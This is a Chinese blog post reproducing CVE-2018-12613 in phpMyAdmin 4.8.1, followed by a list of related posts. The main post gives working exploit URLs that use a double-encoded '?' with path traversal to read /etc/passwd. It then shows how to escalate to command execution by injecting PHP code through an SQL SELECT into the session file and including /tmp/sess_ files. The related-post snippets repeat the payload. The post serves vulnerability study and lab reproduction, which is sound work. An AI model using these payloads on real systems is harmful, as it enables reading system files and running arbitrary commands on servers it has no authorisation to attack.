phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

最新推荐文章于 2024-08-05 17:02:59 发布
最新推荐文章于 2024-08-05 17:02:59 发布
阅读量1.9k 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: cve 漏洞复现 文件包含
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/86539066
版权

0x01 简介

phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。

0x02 漏洞复现

1.将?进行两次URL编码为"%253f",构造下列payload:

http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

在这里插入图片描述
漏洞存在。

2.在SQL中执行select ‘<?php phpinfo() ?>’;,然后查看当前页面cookie中的phpmyadmin的值。
在这里插入图片描述

3.查看服务器的session文件。
在这里插入图片描述

4.包含session文件。

http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5160933e2be04f36fccdd4695d6dbef3

在这里插入图片描述
5.构造执行命令的语句。

select '<?php echo `ls` ?>';

在这里插入图片描述
返回命令执行的结果。
在这里插入图片描述

LQxdp
关注
专栏目录
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613复现
ximo的博客
03-22 1012
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734)
jammny
11-24 1033
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734) 漏洞详情 在PHP5.4.7以前,preg_replace()函数的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞影响 4.0.x~4.0.10.16版本、4.4.x~4.4.15.7版本、4.6.x~4.6.3版本(PHP版本小于5.4.7) 漏洞分析 https://xz.aliyun.com/t/7836 漏洞利用
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2814
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
【网络安全】本地文件包含远程文件包含漏洞详解
最新发布
goldfish8848的博客
08-05 1105
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
Yang_99的博客
07-19 419
使用的是BUUCTF里的环境。 影响版本:4.8.0——4.8.1 访问http://your-ip:8080/index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd,可见/etc/passwd被读取,说明文件包含漏洞存在: 利用方式也比较简单,可以执行一下SELECT ‘<?=phpinfo()?>’;,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可: payload:
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2803
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
phpMyAdmin文件包含漏洞复现CVE-2018-12613
qq_34853514的博客
07-12 557
漏洞简介 漏洞编号: CVE-2018-12613 漏洞详情: 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定已经控制的任何主机,并在phpMyAdmin上执行任意代码 $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码 漏洞影响范围: phpMyAdm
漏洞复现phpmyadmin后台任意文件包含CVE-2018-12613
野原新之助
09-29 799
由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)-hctf218-warmup
Sea_Sand息禅
06-15 2088
用hctf2018的一道题可以重现改漏洞。 根据源码提示进入source.php中,可以拿到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = [...
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 644
漏洞
CVE-2018-12613 (phpmyadmin 4.8.1 远程文件包含漏洞)
weixin_44732566的博客
07-04 522
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 0x01 影响范围 phpMyAdmin 4.8.0 and 4.8.1 are affected. 0x02 原理 漏洞代码 $target_blacklist = array ( 'import.php', 'export.php' ); //
记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
ancan8807的博客
07-28 405
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag in ffffllllaaaagggg 再回过头来观察source.php明显是一道代码审计的问题,其中存在4个限制条件 $_REQUEST['f...
phpmyadmin 4.8.1 远程文件包含漏洞
永不垂头的博客
08-14 713
phpmyadmin 4.8.1 远程文件包含漏洞 文章目录phpmyadmin 4.8.1 远程文件包含漏洞一、漏洞详情二、漏洞复现1.任意文件包含2.任意代码执行3.向数据库写入php代码4.包函session文件三、我的公众号 一、漏洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
phpMyAdmin4.8.1 文件包含漏洞
测试
07-07 1576
起因一个很简单的漏洞, 分析的文章也都出来了很多, 但是看了那些文章, 我一直搞不懂为啥问号要双重url编码, 我自己看那些文章感觉不编码应该也能成功利用的。 并且好像大家对问号编码的说法各有不同。 还是自己下载了份源码看了一下。 4.8.1下载地址:https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-lan...
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)
sweetie 的博客
12-06 573
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)复现
[Vulhub](CVE-2018-12613phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 1015
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值